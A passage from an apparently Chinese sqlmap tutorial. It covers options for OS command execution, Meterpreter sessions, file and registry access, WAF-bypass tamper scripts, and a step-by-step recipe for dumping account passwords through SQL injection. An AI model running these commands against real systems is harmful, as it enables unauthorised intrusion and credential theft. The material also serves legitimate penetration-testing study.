<p>  暴力破解的表在txt/common-tables.txt文件中，你可以自己添加。</p>
<h5 id="2-暴力破解列名"><a href="#2-暴力破解列名" class="headerlink" title="2.暴力破解列名"></a>2.暴力破解列名</h5><p>参数：–common-columns    </p>
<p>与暴力破解表名一样，暴力跑的列名在txt/common-columns.txt中。</p>
<h2 id="十、用户自定义函数注入"><a href="#十、用户自定义函数注入" class="headerlink" title="十、用户自定义函数注入"></a>十、用户自定义函数注入</h2><p>用户自定义函数（UDF）    参数：–udf-inject,–shared-lib    你可以通过编译MySQL注入你自定义的函数（UDFs）或PostgreSQL在windows中的共享库，DLL，或者Linux/Unix中共享对象，上传到服务器数据库自定义函数，然后根据你的选择执行他们，当你注入完成后，sqlmap将会移除它们。</p>
<h2 id="十一、系统文件操作"><a href="#十一、系统文件操作" class="headerlink" title="十一、系统文件操作"></a>十一、系统文件操作</h2><h5 id="1-从数据库服务器中读取文件"><a href="#1-从数据库服务器中读取文件" class="headerlink" title="1.从数据库服务器中读取文件"></a>1.从数据库服务器中读取文件</h5><p>参数：–file-read    </p>
<p>当数据库为MySQL，PostgreSQL或Microsoft SQL Server，并且当前用户有权限使用特定的函数。读取的文件可以是文本也可以是二进制文件。</p>
<h5 id="2-把文件上传到数据库服务器中"><a href="#2-把文件上传到数据库服务器中" class="headerlink" title="2.把文件上传到数据库服务器中"></a>2.把文件上传到数据库服务器中</h5><p>参数：–file-write,–file-dest    </p>
<p>当数据库为MySQL，PostgreSQL或Microsoft SQL Server，并且当前用户有权限使用特定的函数。上传的文件可以是文本也可以是二进制文件。 </p>
<h2 id="十二、操作系统"><a href="#十二、操作系统" class="headerlink" title="十二、操作系统"></a>十二、操作系统</h2><h5 id="1-运行任意操作系统命令"><a href="#1-运行任意操作系统命令" class="headerlink" title="1.运行任意操作系统命令"></a>1.运行任意操作系统命令</h5><p>参数：–os-cmd,–os-shell<br>当数据库为MySQL，PostgreSQL或Microsoft SQL Server，并且当前用户有权限使用特定的函数。</p>
<p>在MySQL、PostgreSQL，sqlmap上传一个二进制库，包含用户自定义的函数，sys_exec()和sys_eval()，那么他创建的这两个函数可以执行系统命令。</p>
<p>在Microsoft SQL Server，sqlmap将会使用xp_cmdshell存储过程，如果被禁（在Microsoft SQL Server 2005及以上版本默认禁制），sqlmap会重新启用它，如果不存在，会自动创建。</p>
<p>用–os-shell参数也可以模拟一个真实的shell，可以输入你想执行的命令。</p>
<p>  当不能执行多语句的时候（比如php或者asp的后端数据库为MySQL时），仍然可能使用INTO OUTFILE写进可写目录，来创建一个web后门。支持的语言：</p>
<p>1、ASP</p>
<p>2、ASP.NET</p>
<p>3、JSP</p>
<p>4、PHP</p>
<h5 id="2-Meterpreter配合使用"><a href="#2-Meterpreter配合使用" class="headerlink" title="2.Meterpreter配合使用"></a>2.Meterpreter配合使用</h5><p>参数：–os-pwn,–os-smbrelay,–os-bof,–priv-esc,–msf-path,–tmp-path    </p>
<p>当数据库为MySQL，PostgreSQL或Microsoft SQL Server，并且当前用户有权限使用特定的函数，可以在数据库与攻击者直接建立TCP连接，这个连接可以是一个交互式命令行的Meterpreter会话，sqlmap根据Metasploit生成shellcode，并有四种方式执行它：</p>
<p>1、通过用户自定义的sys_bineval()函数在内存中执行Metasplit的shellcode，支持MySQL和PostgreSQL数据库，参数：–os-pwn。</p>
<p>2、通过用户自定义的函数上传一个独立的payload执行，MySQL和PostgreSQL的sys_exec()函数，Microsoft SQL Server的xp_cmdshell()函数，参数：–os-pwn。</p>
<p>3、通过SMB攻击(MS08-068)来执行Metasploit的shellcode，当sqlmap获取到的权限足够高的时候（Linux/Unix的uid=0，Windows是Administrator），–os-smbrelay。</p>
<p>4、通过溢出Microsoft SQL Server2000和2005的sp_replwritetovarbin存储过程(MS09-004)，在内存中执行Metasploit的payload，参数：–os-bof </p>
<h2 id="十三、对windows注册表操作"><a href="#十三、对windows注册表操作" class="headerlink" title="十三、对windows注册表操作"></a>十三、对windows注册表操作</h2><p>满足以下条件就可以对Windows注册表进行操作：</p>
<p>目标数据库管理系统是运行在Windows上的</p>
<p>目标数据库管理系统是MySQL、PostgreSQL或微软SQL Server</p>
<p>支持堆查询</p>
<p>目标数据库管理系统当前用户有足够的权限</p>
<h5 id="1-读Windows注册表键值"><a href="#1-读Windows注册表键值" class="headerlink" title="1.读Windows注册表键值"></a>1.读Windows注册表键值</h5><p>  参数：–reg-read</p>
<h5 id="2-写Windows注册表键值"><a href="#2-写Windows注册表键值" class="headerlink" title="2.写Windows注册表键值"></a>2.写Windows注册表键值</h5><p>   参数：–reg-add</p>
<h5 id="3-删除Windows注册表键值"><a href="#3-删除Windows注册表键值" class="headerlink" title="3.删除Windows注册表键值"></a>3.删除Windows注册表键值</h5><p>   参数：–reg-del </p>
<p>4.注册表辅助选项</p>
<p>  参数：–reg-key、–reg-value、–reg-data和–reg-type</p>
<p>  适当使用上列参数就可以在命令中添加或修改一个Windows注册表键值而不用在Sqlmap运行时以交互方式提供数据。</p>
<p>–reg-key：指定Windows注册表键值的路径</p>
<p>–reg-value：指定Windows注册表键值的键</p>
<p>–reg-data：指定Windows注册表键值的值</p>
<p>–reg-type：指定Windows注册表键值的值的数据类型</p>
<h2 id="十四、其他"><a href="#十四、其他" class="headerlink" title="十四、其他"></a>十四、其他</h2><h5 id="1-使用简写"><a href="#1-使用简写" class="headerlink" title="1.使用简写"></a>1.使用简写</h5><p>  参数：-z</p>
<p>  有些参数组合是被经常用到的，如“–batch –random-agent –ignore-proxy –technique=BEU”，这样写一大串很不好看，在Sqlmap中，提供了一种简写的方式来缩短命令长度。</p>
<p>  利用参数“-z”，每个参数都可以只写前几个字母，如“–batch”可以简写为“bat”。简写的原则是能够有所区别、对应的参数唯一就行。各个参数用逗号隔开。如：<br>   python sqlmap.py -z “bat,randoma,ign,tec=BEU” -u “<a href="http://www.target.com/vuln.php?id=1&quot;" target="_blank" rel="noopener">www.target.com/vuln.php?id=1&quot;</a></p>
<h5 id="2-在成功检测到注入点时报警"><a href="#2-在成功检测到注入点时报警" class="headerlink" title="2.在成功检测到注入点时报警"></a>2.在成功检测到注入点时报警</h5><p>  参数：–alert</p>
<p>  该参数用于在找到新的注入点时发出警报，后跟一个用于发出警报的命令，如：</p>
<p>   python sqlmap.py -r data.txt –alert “notify-send ‘找到漏洞了’“</p>
<p>  上例中用于发出警报的命令是Ubuntu中的notify-send命令</p>
<h5 id="3-设置问题的回答"><a href="#3-设置问题的回答" class="headerlink" title="3.设置问题的回答"></a>3.设置问题的回答</h5><p>  参数：–answers</p>
<p>  使用“–batch”以非交互模式运行时所有问题都以按默认值作为回答。有时不想以默认值为答案又想使用非交互模式，此时可以使用参数“–answers”对特定问题进行回答，若回答多个问题，以逗号分隔。如：</p>
<p>  python sqlmap.py -u “<a href="http://192.168.22.128/sqlmap/mysql/get_int.php?id=1&quot;--technique=E" target="_blank" rel="noopener">http://192.168.22.128/sqlmap/mysql/get_int.php?id=1&quot;--technique=E</a> –answers=”extending=N” –batch</p>
<h5 id="4-在成功检测到注入点时发出“嘟”声"><a href="#4-在成功检测到注入点时发出“嘟”声" class="headerlink" title="4.在成功检测到注入点时发出“嘟”声"></a>4.在成功检测到注入点时发出“嘟”声</h5><p>  参数：–beep</p>
<p>  使用此参数可以在成功检测到注入点时发出“嘟”声。使用“-m”从日志文件中检测大量网站时该参数会格外有用</p>
<h5 id="5-清除sqlmap创建的临时表和自定义函数"><a href="#5-清除sqlmap创建的临时表和自定义函数" class="headerlink" title="5.清除sqlmap创建的临时表和自定义函数"></a>5.清除sqlmap创建的临时表和自定义函数</h5><p>  参数：–cleanup</p>
<p>  强烈推荐在测试结束后使用此参数清除sqlmap创建的临时表和自定义函数，sqlmap会尽可能地清除数据库管理系统和文件系统上的入侵痕迹。</p>
<h5 id="6-检查依赖"><a href="#6-检查依赖" class="headerlink" title="6.检查依赖"></a>6.检查依赖</h5><p>  参数：–dependencies</p>
<p>  sqlmap的有些功能依赖第三方库，在用到时发现没有这些库会报错退出。使用此参数可以检查依赖的第三方库是否安装，如：</p>
<p>  python sqlmap.py –dependencies</p>
<h5 id="7-关闭彩色输出"><a href="#7-关闭彩色输出" class="headerlink" title="7.关闭彩色输出"></a>7.关闭彩色输出</h5><p>参数：–disable-coloring</p>
<h5 id="8-指定使用Google-dork结果的某页"><a href="#8-指定使用Google-dork结果的某页" class="headerlink" title="8.指定使用Google dork结果的某页"></a>8.指定使用Google dork结果的某页</h5><p>  参数：–gpage</p>
<p>  使用参数“-g”时默认默认选择Google dork结果的前100条做注入测试。结合使用此参数，可以指定使用Google dork结果的某页。</p>
<h5 id="9-使用HTTP参数污染"><a href="#9-使用HTTP参数污染" class="headerlink" title="9.使用HTTP参数污染"></a>9.使用HTTP参数污染</h5><p>  参数：–hpp</p>
<p>  HTTP参数污染是绕过WAF/IPS/IDS的一种技术，这一技术针对ASP/IIS和ASP.NET/IIS平台尤其有效。如果怀疑目标受WAF/IPS/IDS保护，可以尝试用此参数进行绕过。</p>
<h5 id="10-彻底检测WAF-IPS-IDS"><a href="#10-彻底检测WAF-IPS-IDS" class="headerlink" title="10.彻底检测WAF/IPS/IDS"></a>10.彻底检测WAF/IPS/IDS</h5><p>  参数：–identify-waf</p>
<p>  sqlmap可以识别WAF/IPS/IDS以便用户进行针对性操作（如：添加“–tamper”）。目前sqlmap支持检测30多种不同的WAF/IPS/IDS，如Airlock和Barracuda WAF等。检测WAF的脚本可以在安装目录的waf目录中找到。</p>
<p>  python sqlmap.py -u “<a href="http://192.168.21.128/sqlmap/mysql/get_int.php?id=1&quot;" target="_blank" rel="noopener">http://192.168.21.128/sqlmap/mysql/get_int.php?id=1&quot;</a> –identify-waf -v 3</p>
<p>参数：–skip-waf</p>
<p>  默认地sqlmap会发送虚假的SQL注入playload以试探目标是否有保护措施。如有任何问题，用户可以使用参数“–skip-waf”来禁用这一技术。</p>
<h5 id="11-模仿智能手机"><a href="#11-模仿智能手机" class="headerlink" title="11.模仿智能手机"></a>11.模仿智能手机</h5><p>  参数：–mobile</p>
<p>  有些网站对智能手机和桌面环境的返回是不同的。当需要测试这种网站的智能手机页面时可以设置一个智能手机的User-Agent，或者更简单地，使用此参数，Sqlmap会在执行时询问要模仿成流行的手机中的哪种</p>
<h5 id="12-离线模式（仅仅使用会话数据）"><a href="#12-离线模式（仅仅使用会话数据）" class="headerlink" title="12.离线模式（仅仅使用会话数据）"></a>12.离线模式（仅仅使用会话数据）</h5><p>  参数：–offline</p>
<p>  添加此参数，sqlmap将仅仅使用以前存储的会话数据做测试而不向目标发送任何数据包。</p>
<h5 id="13-在Google-dork中展示页面权重"><a href="#13-在Google-dork中展示页面权重" class="headerlink" title="13.在Google dork中展示页面权重"></a>13.在Google dork中展示页面权重</h5><p>  参数：–page-rank</p>
<p>  与参数“-g”一起使用，这会使sqlmap向Google发起更多的请求并展示页面权重</p>
<h5 id="14-从输出目录中安全移除所有内容"><a href="#14-从输出目录中安全移除所有内容" class="headerlink" title="14.从输出目录中安全移除所有内容"></a>14.从输出目录中安全移除所有内容</h5><p>  参数：–purge-output</p>
<p>当用户想要安全地删除输出目录中的所有内容时使用此参数。所谓安全删除，不仅仅是删除，而是在删除前先用随机数据覆盖原有数据，甚至对文件名和目录名也进行重命名以覆盖旧名称，所有覆盖工作完成后才执行删除。最后，输出目录中会一无所有。如：</p>
<p> python sqlmap.py –purge-output -v 3</p>
<h5 id="15-快速扫描"><a href="#15-快速扫描" class="headerlink" title="15.快速扫描"></a>15.快速扫描</h5><p>  参数：–smart</p>
<p>  当有大量URL要进行测试（如：“-m”），目的是尽快找出其中存在的某些注入点而有所遗漏也没有关系时可以使用“–smart”进行正向启发式扫描。此时只有让数据库管理系统报错的参数才会做进一步测试，其余URL均被跳过。</p>
<h5 id="16-通过关键词使用或跳过payload"><a href="#16-通过关键词使用或跳过payload" class="headerlink" title="16.通过关键词使用或跳过payload"></a>16.通过关键词使用或跳过payload</h5><p>  参数：–test-filter</p>
<p>  若只想使用包含关键词“ROW”的payload可使用参数“–test-filter=ROW”。下面是以Mysql为目标的例子：</p>
<p>  python sqlmap.py -u “<a href="http://192.168.21.128/sqlmap/mysql/get_int.php?id=1&quot;" target="_blank" rel="noopener">http://192.168.21.128/sqlmap/mysql/get_int.php?id=1&quot;</a> –batch –test-filter=ROW</p>
<p>  参数：–test-skip</p>
<p>  若不想使用包含关键词“BENCHMARK”的payload可使用参数“–test-skip=BENCHMARK”。</p>
<h5 id="17-交互式sqlmap-Shell"><a href="#17-交互式sqlmap-Shell" class="headerlink" title="17.交互式sqlmap Shell"></a>17.交互式sqlmap Shell</h5><p>  参数：–sqlmap-shell</p>
<p>  使用此参数可以打开一个交互式的sqlmap Shell，支持历史记录。</p>
<h5 id="18-为初学者准备的简单向导"><a href="#18-为初学者准备的简单向导" class="headerlink" title="18.为初学者准备的简单向导"></a>18.为初学者准备的简单向导</h5><p>  参数：–wizard</p>
<p>  sqlmap特地为初学者准备了一个有着尽可能少问题的工作流的向导。用户输入目标后若一直按回车选择默认回答到工作流的最后也会得到一个正确的结果。</p>
<h2 id="一把梭之脚本"><a href="#一把梭之脚本" class="headerlink" title="一把梭之脚本"></a>一把梭之脚本</h2><h4 id="穿WAF脚本"><a href="#穿WAF脚本" class="headerlink" title="穿WAF脚本"></a>穿WAF脚本</h4><p>   脚本穿waf(space2hash.py，base64encode.py, charencode.py不同的的脚本针对不同的数据库或者开发环境)： </p>
<p>  -u xxx -v 3 –dbs –batch –tamper”space2morehash.py”</p>
<h2 id="一把梭之Post注入"><a href="#一把梭之Post注入" class="headerlink" title="一把梭之Post注入"></a>一把梭之Post注入</h2><h5 id="方法一"><a href="#方法一" class="headerlink" title="方法一:"></a>方法一:</h5><p>sqlmap.py -r test.txt -p “抓包到的post数据里面的其中一个post参数” –dbs</p>
<p>  解释意思：sqlamp进行post注入并且假如存在注入就返回数据库的信息，test.txt文档就是对网页抓到的包全选数据包内容然后保存为test.txt文件，直接-r test.txt是把文档放在与sqlmap同一目录下的才行。-p是指定参数注入，更精准</p>
<p>  假如不是放在与sqlmap同一目录下的话，那么就是sqlmap.py -r D:\test.txt -p “抓包到的post数据里面的其中一个post参数” –dbs</p>
<h5 id="方法二"><a href="#方法二" class="headerlink" title="方法二:"></a>方法二:</h5><p>sqlmap.py -u “存在注入的url,一般多用于后台” –data=”抓到的post包的最后一行的内容” -p “指定post包里面的某一个参数”</p>
<h5 id="方法三"><a href="#方法三" class="headerlink" title="方法三:"></a>方法三:</h5><p>假设有个网站，url地址为</p>
<p><a href="http://www.127.0.0.1/base64?id=10" target="_blank" rel="noopener">http://www.127.0.0.1/base64?id=10</a></p>
<p>假如想测试这个页面是否有post注入用这个方式:</p>
<p>sqlmap.py -u “<a href="http://www.127.0.0.1/base64”" target="_blank" rel="noopener">http://www.127.0.0.1/base64”</a> –data=”id=10” -f –banner –dbs</p>
<h5 id="方法四"><a href="#方法四" class="headerlink" title="方法四:"></a>方法四:</h5><p>自动注入方法</p>
<p>sqlmap.py -u “<a href="http://xxxxxx.com(cn/net/org)/login.asp(php,aspx,jsp等程序格式)”" target="_blank" rel="noopener">http://xxxxxx.com(cn/net/org)/login.asp(php,aspx,jsp等程序格式)”</a> –forms      </p>
<p>一般用于后台注入。</p>
<h2 id="一把梭之cookie注入"><a href="#一把梭之cookie注入" class="headerlink" title="一把梭之cookie注入"></a>一把梭之cookie注入</h2><h5 id="方法一-1"><a href="#方法一-1" class="headerlink" title="方法一:"></a>方法一:</h5><p>假设有个网站，url地址为<a href="http://www.127.0.0.1/base32?id=45" target="_blank" rel="noopener">http://www.127.0.0.1/base32?id=45</a></p>
<p>假如想测试这个页面是否有cookie注入</p>
<p>采用的注入方式如下:sqlmap.py -u “<a href="http://www.127.0.0.1/base32”" target="_blank" rel="noopener">http://www.127.0.0.1/base32”</a> –data=”id=10” –dbs –level 2</p>
<p>解释：level 2是探测等级的意思，这里采用注入选择探测等级为2，当探测等级为2或2以上sqlmap是会尝试注入cookie参数的</p>
<h5 id="方法二-1"><a href="#方法二-1" class="headerlink" title="方法二:"></a>方法二:</h5><p>sqlmap.py -u “存在注入url” –cookie=”抓包抓到的cookie”</p>
<p>或者是这样使用:sqlmap.py -u “存在注入url” –cookir=”抓包抓到的cookie” –level 2    //前面讲过了探测等级为2就注入cookie参数的</p>
<h2 id="一次sqlmap注入某注入点并且dump出账号密码全程"><a href="#一次sqlmap注入某注入点并且dump出账号密码全程" class="headerlink" title="一次sqlmap注入某注入点并且dump出账号密码全程"></a>一次sqlmap注入某注入点并且dump出账号密码全程</h2><p>判断注入点:sqlmap.py -u “存在注入url”</p>
<p>爆出所有数据库名字:sqlmap.py -u “存在注入url” –dbs</p>
<p>查看当前使用账号:sqlmap.py -u “存在注入url” –current-user</p>
<p>//打**的是关键看我下面的四步走</p>
<p>1、**查看当前数据库:sqlmap.py -u “存在注入url” –current-db</p>
<p>2、**列出数据库中所有表:sqlmap.py -u “存在注入url” –tables，除了这样也可以这样整，如下所示:sqlmap.py -u “存在注入url” -D “当前数据库名” –tables   //解释说明：-D是指定数据库名称。</p>
<p>3、**-T是指定列要出字段的表，就是数据库中的表名。</p>
<p>列出数据库中的表中的字段:sqlmap.py -u “存在注入url” -D “当前数据库名” -T “数据库中的随意一张表(选取表需要自己判断)” –columns。</p>
<p>4、**跑出来表中的字段然后暴力拆解账号和密码,一般字段账号密码都是user/pass/password/username/keyword这些等等，自己找敏感的字段然后进行拆解。</p>
<p>-C指定要暴力拆解的字段</p>
<p>暴力拆解账号密码:sqlmap.py -u “存在注入url ” -D “当前数据库名” -T “数据库中的随意一张表(选取表需要自己判断)” -C “username,password,email(columns(字段)中疑似网站账号密码邮箱等敏感字段，举例子说明)” –dump</p>
<p> –dump将结果导出。</p>
<p>四步走有异曲同工之处，不管是什么方式的注入他们的方法都不会变。</p>
<h1 id="SQLMAP-–tamper-绕过WAF脚本"><a href="#SQLMAP-–tamper-绕过WAF脚本" class="headerlink" title="SQLMAP –tamper 绕过WAF脚本"></a>SQLMAP –tamper 绕过WAF脚本</h1><table>
<thead>
<tr>
<th>支持的数据库</th>
<th>编号</th>
<th>脚本名称</th>
<th>作用</th>
</tr>
</thead>
<tbody>
<tr>
<td>all</td>
<td>1</td>
<td>apostrophemask.py</td>
<td>用utf8代替引号</td>
</tr>
<tr>
<td></td>
<td>2</td>
<td>base64encode.py</td>
<td>用base64编码替换</td>
</tr>
<tr>
<td></td>
<td>3</td>
<td>multiplespaces.py</td>
<td>围绕SQL关键字添加多个空格</td>
</tr>
<tr>
<td></td>
<td>4</td>
<td>space2plus.py</td>
<td>用+替换空格</td>
</tr>
<tr>
<td></td>
<td>5</td>
<td>nonrecursivereplacement.py</td>
<td>双重查询语句。取代predefined SQL关键字with表示 suitable for替代（例如  .replace（“SELECT”、””)） filters</td>
</tr>
<tr>
<td></td>
<td>6</td>
<td>space2randomblank.py</td>
<td>代替空格字符（“”）从一个随机的空白字符可选字符的有效集</td>
</tr>
<tr>
<td></td>
<td>7</td>
<td>unionalltounion.py</td>
<td>替换UNION ALL SELECT UNION SELECT</td>
</tr>
<tr>
<td></td>
<td>8</td>
<td>securesphere.py</td>
<td>追加特制的字符串</td>
</tr>
<tr>
<td>mssql</td>
<td>9</td>
<td>space2hash.py</td>
<td>绕过过滤‘=’ 替换空格字符（”），（’ – ‘）后跟一个破折号注释，一个随机字符串和一个新行（’ n’）</td>
</tr>
<tr>
<td></td>
<td>10</td>
<td>equaltolike.py</td>
<td>like 代替等号</td>
</tr>
<tr>
<td></td>
<td>11</td>
<td>space2mssqlblank.py(mssql)</td>
<td>空格替换为其它空符号</td>
</tr>
<tr>
<td></td>
<td>12</td>
<td>space2mssqlhash.py</td>
<td>替换空格</td>
</tr>
<tr>
<td></td>
<td>13</td>
<td>between.py</td>
<td>用between替换大于号（&gt;）</td>
</tr>
<tr>
<td></td>
<td>14</td>
<td>percentage.py</td>
<td>asp允许每个字符前面添加一个%号</td>
</tr>
<tr>
<td></td>
<td>15</td>
<td>sp_password.py</td>
<td>追加sp_password’从DBMS日志的自动模糊处理的有效载荷的末尾</td>
</tr>
<tr>
<td></td>
<td>16</td>
<td>charencode.py</td>
<td>url编码</td>
</tr>
<tr>
<td></td>
<td>17</td>
<td>randomcase.py</td>
<td>随机大小写</td>
</tr>
<tr>
<td></td>
<td>18</td>
<td>charunicodeencode.py</td>
<td>字符串 unicode 编码</td>
</tr>
<tr>
<td></td>
<td>19</td>
<td>space2comment.py</td>
<td>Replaces space character (‘ ‘) with comments ‘/**/’</td>
</tr>
<tr>
<td>mysql &gt;= 5.1.13</td>
<td>20</td>
<td>equaltolike.py</td>
<td>like 代替等号</td>
</tr>
<tr>
<td></td>
<td>21</td>
<td>greatest.py</td>
<td>绕过过滤’&gt;’ ,用GREATEST替换大于号。</td>
</tr>
<tr>
<td></td>
<td>22</td>
<td>apostrophenullencode.py</td>
<td>绕过过滤双引号，替换字符和双引号。</td>
</tr>
<tr>
<td></td>
<td>23</td>
<td>ifnull2ifisnull.py</td>
<td>绕过对 IFNULL 过滤。替换类似’IFNULL(A, B)’为’IF(ISNULL(A), B, A)’</td>
</tr>
<tr>
<td></td>
<td>24</td>
<td>space2mssqlhash.py</td>
<td>替换空格</td>
</tr>
<tr>
<td></td>
<td>25</td>
<td>modsecurityversioned.py</td>
<td>过滤空格，包含完整的查询版本注释</td>
</tr>
<tr>
<td></td>
<td>26</td>
<td>space2mysqlblank.py</td>
<td>空格替换其它空白符号(mysql)</td>
</tr>
<tr>
<td></td>
<td>27</td>
<td>between.py</td>
<td>用between替换大于号（&gt;）</td>
</tr>
<tr>
<td></td>
<td>28</td>
<td>modsecurityzeroversioned.py</td>
<td>包含了完整的查询与零版本注释</td>
</tr>
<tr>
<td></td>
<td>29</td>
<td>space2mysqldash.py</td>
<td>替换空格字符（”）（’ – ‘）后跟一个破折号注释一个新行（’ n’）</td>
</tr>
<tr>
<td></td>
<td>30</td>
<td>bluecoat.py</td>
<td>代替空格字符后与一个有效的随机空白字符的SQL语句。然后替换=为like</td>
</tr>
<tr>
<td></td>
<td>31</td>
<td>percentage.py</td>
<td>asp允许每个字符前面添加一个%号</td>
</tr>
<tr>
<td></td>
<td>32</td>
<td>charencode.py</td>
<td>url编码</td>
</tr>
<tr>
<td></td>
<td>33</td>
<td>randomcase.py</td>
<td>随机大小写</td>
</tr>
<tr>
<td></td>
<td>34</td>
<td>versionedkeywords.py</td>
<td>Encloses each non-function keyword with versioned MySQL comment</td>
</tr>
<tr>
<td></td>
<td>35</td>
<td>space2comment.py</td>
<td>Replaces space character (‘ ‘) with comments ‘/**/’</td>
</tr>
<tr>
<td></td>
<td>36</td>
<td>charunicodeencode.py</td>
<td>字符串 unicode 编码</td>
</tr>
<tr>
<td></td>
<td>37</td>
<td>versionedmorekeywords.py</td>
<td>注释绕过</td>
</tr>
<tr>
<td>MySQL &lt; 5.1</td>
<td>38</td>
<td>halfversionedmorekeywords.py</td>
<td>关键字前加注释</td>
</tr>
<tr>
<td></td>
<td>39</td>
<td>halfversionedmorekeywords.py</td>
<td>当数据库为mysql时绕过防火墙，每个关键字之前添加mysql版本评论</td>
</tr>
<tr>
<td>MySQL &gt;= 5.1.13</td>
<td>40</td>
<td>space2morehash.py</td>
<td>空格替换为 #号 以及更多随机字符串 换行符</td>
</tr>
<tr>
<td>Oracle</td>
<td>41</td>
<td>greatest.py</td>
<td>绕过过滤’&gt;’ ,用GREATEST替换大于号。</td>
</tr>
<tr>
<td></td>
<td>42</td>
<td>apostrophenullencode.py</td>
<td>绕过过滤双引号，替换字符和双引号。</td>
</tr>
<tr>
<td></td>
<td>43</td>
<td>between.py</td>
<td>用between替换大于号（&gt;）</td>
</tr>
<tr>
<td></td>
<td>44</td>
<td>charencode.py</td>
<td>url编码</td>
</tr>
<tr>
<td></td>
<td>45</td>
<td>randomcase.py</td>
<td>随机大小写</td>
</tr>
<tr>
<td></td>
<td>46</td>
<td>charunicodeencode.py</td>
<td>字符串 unicode 编码</td>
</tr>
<tr>
<td></td>
<td>47</td>
<td>space2comment.py</td>
<td>Replaces space character (‘ ‘) with comments ‘/**/’</td>
</tr>
<tr>
<td>PostgreSQL</td>
<td>48</td>
<td>greatest.py</td>
<td>绕过过滤’&gt;’ ,用GREATEST替换大于号。</td>
</tr>
<tr>
<td></td>
<td>49</td>
<td>apostrophenullencode.py</td>
<td>绕过过滤双引号，替换字符和双引号。</td>
</tr>
<tr>
<td></td>
<td>50</td>
<td>between.py</td>
<td>用between替换大于号（&gt;）</td>
</tr>
<tr>
<td></td>
<td>51</td>
<td>percentage.py</td>
<td>asp允许每个字符前面添加一个%号</td>
</tr>
<tr>
<td></td>
<td>52</td>
<td>charencode.py</td>
<td>url编码</td>
</tr>
<tr>
<td></td>
<td>53</td>
<td>randomcase.py</td>
<td>随机大小写</td>
</tr>
<tr>
<td></td>
<td>54</td>
<td>charunicodeencode.py</td>
<td>字符串 unicode 编码</td>
</tr>
<tr>
<td></td>
<td>55</td>
<td>space2comment.py</td>
<td>Replaces space character (‘ ‘) with comments ‘/**/’</td>
</tr>
<tr>
<td>Access</td>
<td>56</td>
<td>appendnullbyte.py</td>
<td>在有效负荷结束位置加载零字节字符编码</td>
</tr>
<tr>
<td>其他</td>
<td>57</td>
<td>chardoubleencode.py</td>
<td>双url编码(不处理以编码的)</td>
</tr>
<tr>
<td></td>
<td>58</td>
<td>unmagicquotes.py</td>
<td>宽字符绕过 GPC  addslashes</td>
</tr>
<tr>
<td></td>
<td>59</td>
<td>randomcomments.py</td>
<td>用/**/分割sql关键字</td>
</tr>
</tbody>
</table>
<p><strong>SQLMAP实战操作：</strong></p>
<p><strong>1.ACCESS数据库：</strong></p>
<p><code>sqlmap.py -u “url” /*-u为常规扫描参数*/</code></p>
<p><code>sqlmap.py -u “url” –tables /*–tables拆数据库表*/</code></p>
<p><code>sqlmap.py -u “url” –columns -T “要拆的表名”/*列出指定表名*/</code></p>
<p><code>sqlmap.py -u “url” –dump -T “要拆的表名”-C “要拆的字段名” /*–dump为拆解字段名会保存在sqlmap/output目录下*/</code></p>
<p><strong>2.MYSQL数据库：</strong></p>
<p><code>sqlmap.py -u “url” /*扫描注入点*/</code></p>
<p><code>sqlmap.py -u “url” –dbs /*列出所有数据库*/</code></p>
<p><code>sqlmap.py -u “url” –current-db /*列出当前数据库*/</code></p>
<p><code>sqlmap.py -u “url” –current-user /*列出当前用户*/</code></p>
<p><code>sqlmap.py -u “url” –tables -D “当前数据库名” /*拆解当前数据库表*/</code></p>
<p><code>sqlmap.py -u “url” –columns -T “要拆得的表名” -D “当前数据库名” /*拆解指定表字段名*/</code></p>
<p><code>sqlmap.py -u “url” –dump -C “字段名” -T “表名” -D “当前数据库”</code></p>
<p><strong>3.SQLSERVER数据库：</strong></p>
<p><code>&lt;!--sqlmap.py -u “url” /*扫描注入点*/--&gt;</code></p>
<p><code>&lt;!--sqlmap.py -u “url” –dbs /*列出所有数据库*/--&gt;</code></p>
<p><code>&lt;!--sqlmap.py -u “url” –current-db /*列出当前数据库*/--&gt;</code></p>
<p><code>&lt;!--sqlmap.py -u “url” –current-user /*列出当前用户*/--&gt;</code></p>
<p><code>&lt;!--sqlmap.py -u “url” –tables -D “当前数据库名” /*拆解当前数据库表*/--&gt;</code></p>
<p><code>&lt;!--sqlmap.py -u “url” –columns -T “要拆得的表名” -D “当前数据库名” /*拆解指定表字段名*/--&gt;</code></p>
<p><code>&lt;!--sqlmap.py -u “url” –dump -C “字段名” -T “表名” -D “当前数据库”--&gt;</code></p>
<p><code>&lt;!--SQLSERVER操作和MYSQL是一样的！！！常见的几种数据库！！！--&gt;</code></p>
<p><strong>4.COOKIE注入：</strong></p>
<p><code>sqlmap.py -u “[www.xxx.com/asp](http://www.xxx.com/asp)或者[www.xxx.com/php](http://www.xxx.com/php)” –cookie</code> “参数名如id=1” –level 2/<em>level为提升权限</em>/</p>
<p>什么数据库就按照上面的数据库加上cookie语句拆解就行了</p>
<p><strong>5.POST注入：</strong></p>
<p>抓包保存到SQLMAP目录下.txt的文件然后输入指令sqlmap.py -r xxx.txt /*xxx.txt为保存包文件的文件名”</p>
<p><code>sqlmap.py -u “url” –data “POST参数”</code></p>
<p><strong>6.执行shell命令：</strong></p>
<p><code>sqlmap.py -u “url” –os-cmd=”net user” /*执行net user命令*/</code></p>
<p><code>sqlmap.py -u “url” –os-shell /*系统交互的shell*/</code></p>
<p><strong>7.注入HTTP请求 :</strong></p>
<p><code>sqlmap.py -r xxx.txt –dbs /*xxx.txt内容为HTTP请求*/</code></p>
<p><strong>8.绕过WAF的tamper插件使用：</strong></p>
<p><code>sqlmap.py -u “url” –tamper “xxx.py”</code></p>
<p><code>sqlmap.py -u “url” –tamper=”xxx.py”</code></p>
<p>关于tamper脚本详细说明在本博客中有，链接为：<a href="http://www.matsec.cn/?id=5" target="_blank" rel="noopener">http://www.matsec.cn/?id=5</a></p>
<p><strong>9.将注入语句插入到指定位置：</strong></p>
<p><code>sqlmap.py -u “url([www.xxx.com/id/1](http://www.xxx.com/id/1)*.html)” –dbs</code></p>
<p>有些网站是采用伪静态的页面使用SQLMAP的普通注入是不行的，所以SQLMAP提供了”*”参数将SQL语句插入指定位置，一般用于伪静态注入。</p>
<p>在使用HTTP注入时使用-r参数也可以直接在文本中添加*号</p>
<p><strong>10.延时注入：</strong></p>
<p><code>sqlmap –dbs -u “url” –delay 0.5 /*延时0.5秒*/</code></p>
<p><code>sqlmap –dbs -u “url” –safe-freq /*请求2次*/</code></p>
<p><strong>11.使用谷歌语法搜索注入(Google hack)：</strong></p>
